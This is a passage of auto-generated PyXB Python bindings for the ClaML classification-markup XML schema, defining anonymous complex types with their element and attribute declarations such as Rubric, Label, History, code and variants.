__Meta = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Meta'), 'Meta', '__AbsentNamespace0_CTD_ANON_16_Meta', True, pyxb.utils.utility.Location('ClaML.xsd', 53, 4), )
Meta = property(__Meta.value, __Meta.set, None, None)
# Element ModifiedBy uses Python identifier ModifiedBy
__ModifiedBy = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'ModifiedBy'), 'ModifiedBy', '__AbsentNamespace0_CTD_ANON_16_ModifiedBy', True, pyxb.utils.utility.Location('ClaML.xsd', 186, 4), )
ModifiedBy = property(__ModifiedBy.value, __ModifiedBy.set, None, None)
# Element ExcludeModifier uses Python identifier ExcludeModifier
__ExcludeModifier = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'ExcludeModifier'), 'ExcludeModifier', '__AbsentNamespace0_CTD_ANON_16_ExcludeModifier', True, pyxb.utils.utility.Location('ClaML.xsd', 205, 4), )
ExcludeModifier = property(__ExcludeModifier.value, __ExcludeModifier.set, None, None)
# Element Rubric uses Python identifier Rubric
__Rubric = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Rubric'), 'Rubric', '__AbsentNamespace0_CTD_ANON_16_Rubric', True, pyxb.utils.utility.Location('ClaML.xsd', 217, 4), )
Rubric = property(__Rubric.value, __Rubric.set, None, None)
# Element History uses Python identifier History
__History = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'History'), 'History', '__AbsentNamespace0_CTD_ANON_16_History', True, pyxb.utils.utility.Location('ClaML.xsd', 236, 4), )
History = property(__History.value, __History.set, None, None)
# Element SuperClass uses Python identifier SuperClass
__SuperClass = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'SuperClass'), 'SuperClass', '__AbsentNamespace0_CTD_ANON_16_SuperClass', True, pyxb.utils.utility.Location('ClaML.xsd', 242, 4), )
SuperClass = property(__SuperClass.value, __SuperClass.set, None, None)
# Element SubClass uses Python identifier SubClass
__SubClass = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'SubClass'), 'SubClass', '__AbsentNamespace0_CTD_ANON_16_SubClass', True, pyxb.utils.utility.Location('ClaML.xsd', 248, 4), )
SubClass = property(__SubClass.value, __SubClass.set, None, None)
# Attribute code uses Python identifier code
__code = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'code'), 'code', '__AbsentNamespace0_CTD_ANON_16_code', pyxb.binding.datatypes.NMTOKEN, required=True)
__code._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 180, 12)
__code._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 180, 12)
code = property(__code.value, __code.set, None, None)
# Attribute kind uses Python identifier kind
__kind = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'kind'), 'kind', '__AbsentNamespace0_CTD_ANON_16_kind', pyxb.binding.datatypes.IDREF, required=True)
__kind._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 181, 12)
__kind._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 181, 12)
kind = property(__kind.value, __kind.set, None, None)
# Attribute usage uses Python identifier usage
__usage = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'usage'), 'usage', '__AbsentNamespace0_CTD_ANON_16_usage', pyxb.binding.datatypes.IDREF)
__usage._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 182, 12)
__usage._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 182, 12)
usage = property(__usage.value, __usage.set, None, None)
# Attribute variants uses Python identifier variants
__variants = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'variants'), 'variants', '__AbsentNamespace0_CTD_ANON_16_variants', pyxb.binding.datatypes.IDREFS)
__variants._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 183, 12)
__variants._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 183, 12)
variants = property(__variants.value, __variants.set, None, None)
_ElementMap.update({
__Meta.name() : __Meta,
__ModifiedBy.name() : __ModifiedBy,
__ExcludeModifier.name() : __ExcludeModifier,
__Rubric.name() : __Rubric,
__History.name() : __History,
__SuperClass.name() : __SuperClass,
__SubClass.name() : __SubClass
})
_AttributeMap.update({
__code.name() : __code,
__kind.name() : __kind,
__usage.name() : __usage,
__variants.name() : __variants
})
_module_typeBindings.CTD_ANON_16 = CTD_ANON_16
# Complex type [anonymous] with content type EMPTY
class CTD_ANON_17 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 206, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute code uses Python identifier code
__code = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'code'), 'code', '__AbsentNamespace0_CTD_ANON_17_code', pyxb.binding.datatypes.NMTOKEN, required=True)
__code._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 207, 12)
__code._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 207, 12)
code = property(__code.value, __code.set, None, None)
# Attribute variants uses Python identifier variants
__variants = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'variants'), 'variants', '__AbsentNamespace0_CTD_ANON_17_variants', pyxb.binding.datatypes.IDREFS)
__variants._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 208, 12)
__variants._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 208, 12)
variants = property(__variants.value, __variants.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__code.name() : __code,
__variants.name() : __variants
})
_module_typeBindings.CTD_ANON_17 = CTD_ANON_17
# Complex type [anonymous] with content type EMPTY
class CTD_ANON_18 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 212, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute code uses Python identifier code
__code = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'code'), 'code', '__AbsentNamespace0_CTD_ANON_18_code', pyxb.binding.datatypes.NMTOKEN, required=True)
__code._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 213, 12)
__code._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 213, 12)
code = property(__code.value, __code.set, None, None)
# Attribute variants uses Python identifier variants
__variants = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'variants'), 'variants', '__AbsentNamespace0_CTD_ANON_18_variants', pyxb.binding.datatypes.IDREFS)
__variants._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 214, 12)
__variants._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 214, 12)
variants = property(__variants.value, __variants.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__code.name() : __code,
__variants.name() : __variants
})
_module_typeBindings.CTD_ANON_18 = CTD_ANON_18
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_19 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 218, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element Label uses Python identifier Label
__Label = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Label'), 'Label', '__AbsentNamespace0_CTD_ANON_19_Label', True, pyxb.utils.utility.Location('ClaML.xsd', 228, 4), )
Label = property(__Label.value, __Label.set, None, None)
# Element History uses Python identifier History
__History = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'History'), 'History', '__AbsentNamespace0_CTD_ANON_19_History', True, pyxb.utils.utility.Location('ClaML.xsd', 236, 4), )
History = property(__History.value, __History.set, None, None)
# Attribute id uses Python identifier id
__id = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'id'), 'id', '__AbsentNamespace0_CTD_ANON_19_id', pyxb.binding.datatypes.ID)
__id._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 223, 12)
__id._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 223, 12)
id = property(__id.value, __id.set, None, None)
# Attribute kind uses Python identifier kind
__kind = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'kind'), 'kind', '__AbsentNamespace0_CTD_ANON_19_kind', pyxb.binding.datatypes.IDREF, required=True)
__kind._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 224, 12)
__kind._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 224, 12)
kind = property(__kind.value, __kind.set, None, None)
# Attribute usage uses Python identifier usage
__usage = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'usage'), 'usage', '__AbsentNamespace0_CTD_ANON_19_usage', pyxb.binding.datatypes.IDREF)
__usage._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 225, 12)
__usage._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 225, 12)
usage = property(__usage.value, __usage.set, None, None)
_ElementMap.update({
__Label.name() : __Label,
__History.name() : __History
})
_AttributeMap.update({
__id.name() : __id,
__kind.name() : __kind,
__usage.name() : __usage
})
_module_typeBindings.CTD_ANON_19 = CTD_ANON_19
# Complex type [anonymous] with content type MIXED
class CTD_ANON_20 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type MIXED"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_MIXED
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 229, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element Reference uses Python identifier Reference
__Reference = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Reference'), 'Reference', '__AbsentNamespace0_CTD_ANON_20_Reference', True, pyxb.utils.utility.Location('ClaML.xsd', 254, 4), )
Reference = property(__Reference.value, __Reference.set, None, None)
# Element Para uses Python identifier Para
__Para = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Para'), 'Para', '__AbsentNamespace0_CTD_ANON_20_Para', True, pyxb.utils.utility.Location('ClaML.xsd', 264, 4), )
Para = property(__Para.value, __Para.set, None, None)
# Element Fragment uses Python identifier Fragment
__Fragment = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Fragment'), 'Fragment', '__AbsentNamespace0_CTD_ANON_20_Fragment', True, pyxb.utils.utility.Location('ClaML.xsd', 270, 4), )
Fragment = property(__Fragment.value, __Fragment.set, None, None)
# Element Include uses Python identifier Include
__Include = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Include'), 'Include', '__AbsentNamespace0_CTD_ANON_20_Include', True, pyxb.utils.utility.Location('ClaML.xsd', 285, 4), )
Include = property(__Include.value, __Include.set, None, None)
# Element IncludeDescendants uses Python identifier IncludeDescendants
__IncludeDescendants = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'IncludeDescendants'), 'IncludeDescendants', '__AbsentNamespace0_CTD_ANON_20_IncludeDescendants', True, pyxb.utils.utility.Location('ClaML.xsd', 291, 4), )
IncludeDescendants = property(__IncludeDescendants.value, __IncludeDescendants.set, None, None)
# Element List uses Python identifier List
__List = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'List'), 'List', '__AbsentNamespace0_CTD_ANON_20_List', True, pyxb.utils.utility.Location('ClaML.xsd', 297, 4), )
List = property(__List.value, __List.set, None, None)
# Element Table uses Python identifier Table
__Table = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Table'), 'Table', '__AbsentNamespace0_CTD_ANON_20_Table', True, pyxb.utils.utility.Location('ClaML.xsd', 317, 4), )
Table = property(__Table.value, __Table.set, None, None)
# Element Term uses Python identifier Term
__Term = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Term'), 'Term', '__AbsentNamespace0_CTD_ANON_20_Term', True, pyxb.utils.utility.Location('ClaML.xsd', 380, 4), )
Term = property(__Term.value, __Term.set, None, None)
# Attribute {http://www.w3.org/XML/1998/namespace}lang uses Python identifier lang
__lang = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(pyxb.namespace.XML, 'lang'), 'lang', '__AbsentNamespace0_CTD_ANON_20_httpwww_w3_orgXML1998namespacelang', pyxb.binding.xml_.STD_ANON_lang, required=True)
__lang._DeclarationLocation = None
__lang._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 231, 12)
lang = property(__lang.value, __lang.set, None, None)
# Attribute {http://www.w3.org/XML/1998/namespace}space uses Python identifier space
__space = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(pyxb.namespace.XML, 'space'), 'space', '__AbsentNamespace0_CTD_ANON_20_httpwww_w3_orgXML1998namespacespace', pyxb.binding.xml_.STD_ANON_space, unicode_default='default')
__space._DeclarationLocation = None
__space._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 232, 12)
space = property(__space.value, __space.set, None, None)
# Attribute variants uses Python identifier variants
__variants = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'variants'), 'variants', '__AbsentNamespace0_CTD_ANON_20_variants', pyxb.binding.datatypes.IDREFS)
__variants._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 233, 12)
__variants._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 233, 12)
variants = property(__variants.value, __variants.set, None, None)
_ElementMap.update({
__Reference.name() : __Reference,
__Para.name() : __Para,
__Fragment.name() : __Fragment,
__Include.name() : __Include,
__IncludeDescendants.name() : __IncludeDescendants,
__List.name() : __List,
__Table.name() : __Table,
__Term.name() : __Term
})
_AttributeMap.update({
__lang.name() : __lang,
__space.name() : __space,
__variants.name() : __variants
})
_module_typeBindings.CTD_ANON_20 = CTD_ANON_20
# Complex type [anonymous] with content type MIXED
class CTD_ANON_21 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type MIXED"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_MIXED
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 237, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute author uses Python identifier author
__author = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'author'), 'author', '__AbsentNamespace0_CTD_ANON_21_author', pyxb.binding.datatypes.IDREF, required=True)
__author._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 238, 12)
__author._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 238, 12)
author = property(__author.value, __author.set, None, None)
# Attribute date uses Python identifier date
__date = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'date'), 'date', '__AbsentNamespace0_CTD_ANON_21_date', pyxb.binding.datatypes.NMTOKEN, required=True)
__date._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 239, 12)
__date._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 239, 12)
date = property(__date.value, __date.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__author.name() : __author,
__date.name() : __date
})
_module_typeBindings.CTD_ANON_21 = CTD_ANON_21
# Complex type [anonymous] with content type EMPTY
class CTD_ANON_22 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 243, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute code uses Python identifier code
__code = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'code'), 'code', '__AbsentNamespace0_CTD_ANON_22_code', pyxb.binding.datatypes.NMTOKEN, required=True)
__code._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 244, 12)
__code._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 244, 12)
code = property(__code.value, __code.set, None, None)
# Attribute variants uses Python identifier variants
__variants = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'variants'), 'variants', '__AbsentNamespace0_CTD_ANON_22_variants', pyxb.binding.datatypes.IDREFS)
__variants._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 245, 12)
__variants._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 245, 12)
variants = property(__variants.value, __variants.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__code.name() : __code,
__variants.name() : __variants
})
_module_typeBindings.CTD_ANON_22 = CTD_ANON_22
# Complex type [anonymous] with content type EMPTY
class CTD_ANON_23 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 249, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute code uses Python identifier code
__code = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'code'), 'code', '__AbsentNamespace0_CTD_ANON_23_code', pyxb.binding.datatypes.NMTOKEN, required=True)
__code._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 250, 12)
__code._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 250, 12)
code = property(__code.value, __code.set, None, None)
# Attribute variants uses Python identifier variants
__variants = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'variants'), 'variants', '__AbsentNamespace0_CTD_ANON_23_variants', pyxb.binding.datatypes.IDREFS)
__variants._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 251, 12)
__variants._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 251, 12)
variants = property(__variants.value, __variants.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__code.name() : __code,
__variants.name() : __variants
})
_module_typeBindings.CTD_ANON_23 = CTD_ANON_23
# Complex type [anonymous] with content type MIXED
class CTD_ANON_24 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type MIXED"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_MIXED
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 255, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute class uses Python identifier class_
__class = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'class'), 'class_', '__AbsentNamespace0_CTD_ANON_24_class', pyxb.binding.datatypes.anySimpleType)
__class._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 256, 12)
__class._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 256, 12)
class_ = property(__class.value, __class.set, None, None)
# Attribute authority uses Python identifier authority
__authority = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'authority'), 'authority', '__AbsentNamespace0_CTD_ANON_24_authority', pyxb.binding.datatypes.NMTOKEN)
__authority._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 257, 12)
__authority._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 257, 12)
authority = property(__authority.value, __authority.set, None, None)
# Attribute uid uses Python identifier uid
__uid = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'uid'), 'uid', '__AbsentNamespace0_CTD_ANON_24_uid', pyxb.binding.datatypes.NMTOKEN)
__uid._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 258, 12)
__uid._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 258, 12)
uid = property(__uid.value, __uid.set, None, None)
# Attribute code uses Python identifier code
__code = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'code'), 'code', '__AbsentNamespace0_CTD_ANON_24_code', pyxb.binding.datatypes.NMTOKEN)
__code._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 259, 12)
__code._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 259, 12)
code = property(__code.value, __code.set, None, None)
# Attribute usage uses Python identifier usage
__usage = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'usage'), 'usage', '__AbsentNamespace0_CTD_ANON_24_usage', pyxb.binding.datatypes.IDREF)
__usage._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 260, 12)
__usage._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 260, 12)
usage = property(__usage.value, __usage.set, None, None)
# Attribute variants uses Python identifier variants
__variants = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'variants'), 'variants', '__AbsentNamespace0_CTD_ANON_24_variants', pyxb.binding.datatypes.IDREFS)
__variants._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 261, 12)
__variants._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 261, 12)
variants = property(__variants.value, __variants.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__class.name() : __class,
__authority.name() : __authority,
__uid.name() : __uid,
__code.name() : __code,
__usage.name() : __usage,
__variants.name() : __variants
})
_module_typeBindings.CTD_ANON_24 = CTD_ANON_24
# Complex type [anonymous] with content type MIXED
class CTD_ANON_25 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type MIXED"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_MIXED
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 265, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element Reference uses Python identifier Reference
__Reference = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Reference'), 'Reference', '__AbsentNamespace0_CTD_ANON_25_Reference', True, pyxb.utils.utility.Location('ClaML.xsd', 254, 4), )
Reference = property(__Reference.value, __Reference.set, None, None)
# Element Term uses Python identifier Term
__Term = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Term'), 'Term', '__AbsentNamespace0_CTD_ANON_25_Term', True, pyxb.utils.utility.Location('ClaML.xsd', 380, 4), )
Term = property(__Term.value, __Term.set, None, None)
# Attribute class uses Python identifier class_
__class = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'class'), 'class_', '__AbsentNamespace0_CTD_ANON_25_class', pyxb.binding.datatypes.anySimpleType)
__class._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 267, 12)
__class._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 267, 12)
class_ = property(__class.value, __class.set, None, None)
_ElementMap.update({
__Reference.name() : __Reference,
__Term.name() : __Term
})
_AttributeMap.update({
__class.name() : __class
})
_module_typeBindings.CTD_ANON_25 = CTD_ANON_25
# Complex type [anonymous] with content type EMPTY
class CTD_ANON_26 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 286, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute class uses Python identifier class_
__class = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'class'), 'class_', '__AbsentNamespace0_CTD_ANON_26_class', pyxb.binding.datatypes.anySimpleType)
__class._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 287, 12)
__class._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 287, 12)
class_ = property(__class.value, __class.set, None, None)
# Attribute rubric uses Python identifier rubric
__rubric = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'rubric'), 'rubric', '__AbsentNamespace0_CTD_ANON_26_rubric', pyxb.binding.datatypes.IDREF, required=True)
__rubric._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 288, 12)
__rubric._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 288, 12)
rubric = property(__rubric.value, __rubric.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__class.name() : __class,
__rubric.name() : __rubric
})
_module_typeBindings.CTD_ANON_26 = CTD_ANON_26
# Complex type [anonymous] with content type EMPTY
class CTD_ANON_27 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 292, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute code uses Python identifier code
__code = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'code'), 'code', '__AbsentNamespace0_CTD_ANON_27_code', pyxb.binding.datatypes.NMTOKEN, required=True)
__code._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 293, 12)
__code._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 293, 12)
code = property(__code.value, __code.set, None, None)
# Attribute kind uses Python identifier kind
__kind = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'kind'), 'kind', '__AbsentNamespace0_CTD_ANON_27_kind', pyxb.binding.datatypes.IDREF, required=True)
__kind._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 294, 12)
__kind._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 294, 12)
kind = property(__kind.value, __kind.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__code.name() : __code,
__kind.name() : __kind
})
_module_typeBindings.CTD_ANON_27 = CTD_ANON_27
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_28 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 298, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element ListItem uses Python identifier ListItem
__ListItem = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'ListItem'), 'ListItem', '__AbsentNamespace0_CTD_ANON_28_ListItem', True, pyxb.utils.utility.Location('ClaML.xsd', 305, 4), )
ListItem = property(__ListItem.value, __ListItem.set, None, None)
# Attribute class uses Python identifier class_
__class = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'class'), 'class_', '__AbsentNamespace0_CTD_ANON_28_class', pyxb.binding.datatypes.anySimpleType)
__class._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 302, 12)
__class._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 302, 12)
class_ = property(__class.value, __class.set, None, None)
_ElementMap.update({
__ListItem.name() : __ListItem
})
_AttributeMap.update({
__class.name() : __class
})
_module_typeBindings.CTD_ANON_28 = CTD_ANON_28
# Complex type [anonymous] with content type MIXED
class CTD_ANON_29 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type MIXED"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_MIXED
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 306, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element Reference uses Python identifier Reference
__Reference = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Reference'), 'Reference', '__AbsentNamespace0_CTD_ANON_29_Reference', True, pyxb.utils.utility.Location('ClaML.xsd', 254, 4), )
Reference = property(__Reference.value, __Reference.set, None, None)
# Element Para uses Python identifier Para
__Para = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Para'), 'Para', '__AbsentNamespace0_CTD_ANON_29_Para', True, pyxb.utils.utility.Location('ClaML.xsd', 264, 4), )
Para = property(__Para.value, __Para.set, None, None)
# Element Include uses Python identifier Include
__Include = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Include'), 'Include', '__AbsentNamespace0_CTD_ANON_29_Include', True, pyxb.utils.utility.Location('ClaML.xsd', 285, 4), )
Include = property(__Include.value, __Include.set, None, None)
# Element List uses Python identifier List
